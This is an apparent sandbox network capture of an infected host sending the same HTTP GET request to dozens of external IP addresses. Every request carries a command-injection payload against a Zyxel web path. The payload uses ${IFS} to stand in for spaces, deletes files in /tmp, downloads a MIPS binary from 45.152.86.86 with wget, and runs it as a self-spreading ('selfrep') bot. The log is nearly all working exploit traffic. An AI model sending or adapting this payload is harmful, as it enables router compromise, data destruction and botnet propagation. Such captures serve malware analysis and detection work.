                              Mar 31, 2024 08:41:14.687414885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2768192.168.2.13544628.73.7.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687477112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2769192.168.2.1344006154.58.56.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687521935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2770192.168.2.1347276158.109.188.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687577009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2771192.168.2.1349898221.222.184.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687632084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2772192.168.2.1334364112.63.252.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687699080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2773192.168.2.1359062201.84.221.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687728882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2774192.168.2.136082270.12.202.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687767029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2775192.168.2.1360196203.241.16.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687829971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2776192.168.2.1358682102.202.106.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687880993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2777192.168.2.1332918141.160.43.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687911034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2778192.168.2.1356072116.225.173.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.687947989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2779192.168.2.135143212.111.237.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688004971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2780192.168.2.134895024.106.43.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688060999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2781192.168.2.1333722100.33.255.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688108921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2782192.168.2.1355748176.27.7.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688158989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2783192.168.2.1345462159.11.190.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688191891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2784192.168.2.1345566167.89.120.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688252926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2785192.168.2.1355442170.92.24.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688299894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2786192.168.2.135810284.9.203.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688374043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2787192.168.2.134654612.194.200.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688412905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2788192.168.2.1351398131.70.180.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688437939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2789192.168.2.1345796212.200.252.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688493013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2790192.168.2.1339484188.245.165.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688533068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2791192.168.2.1347450200.233.84.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688601017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2792192.168.2.133656860.110.182.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688654900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2793192.168.2.1342568174.78.229.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688709974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2794192.168.2.135664237.49.129.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688756943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2795192.168.2.133484487.166.151.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688792944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2796192.168.2.1353894116.242.134.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688834906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2797192.168.2.135317058.255.203.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688880920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2798192.168.2.1352748172.197.10.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688919067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2799192.168.2.1339744190.112.19.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688945055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2800192.168.2.1333834216.20.95.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.688976049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2801192.168.2.1355286165.57.242.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689017057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2802192.168.2.134606090.139.54.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689069986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2803192.168.2.1353606176.208.20.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689120054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2804192.168.2.135244461.106.28.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689173937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2805192.168.2.1359350202.92.146.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689208984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2806192.168.2.133976262.235.162.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689281940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2807192.168.2.1341436175.135.225.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689336061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2808192.168.2.1338294156.170.242.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689373016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2809192.168.2.1357792175.27.198.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689428091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2810192.168.2.134734068.8.184.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689477921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2811192.168.2.1343680144.219.146.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689519882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2812192.168.2.1358518212.245.68.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689562082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2813192.168.2.1356892134.48.73.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689594030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2814192.168.2.1337388176.71.229.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689649105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2815192.168.2.1333910116.14.245.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689686060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2816192.168.2.133767631.132.209.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689728975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2817192.168.2.134069613.94.45.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689796925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2818192.168.2.133434481.71.169.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689834118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2819192.168.2.1353080213.29.96.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689892054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2820192.168.2.1359646111.202.252.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689928055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2821192.168.2.134021644.73.119.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.689964056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2822192.168.2.1339734194.38.64.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690017939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2823192.168.2.1338080180.90.204.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690064907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2824192.168.2.1357188175.247.88.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690118074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2825192.168.2.135536475.111.229.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690152884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2826192.168.2.134960425.139.68.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690208912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2827192.168.2.1360984191.54.115.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690258026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2828192.168.2.134206647.8.240.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690293074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2829192.168.2.1350546204.116.28.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690357924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2830192.168.2.134048640.231.214.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690401077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2831192.168.2.1339024110.4.141.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690418005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2832192.168.2.1352918212.92.179.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690501928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2833192.168.2.134464890.153.164.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690550089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2834192.168.2.134508863.93.73.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690588951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2835192.168.2.134983691.176.39.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:14.690637112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2836192.168.2.133613277.95.191.87443
                              TimestampBytes transferredDirectionData
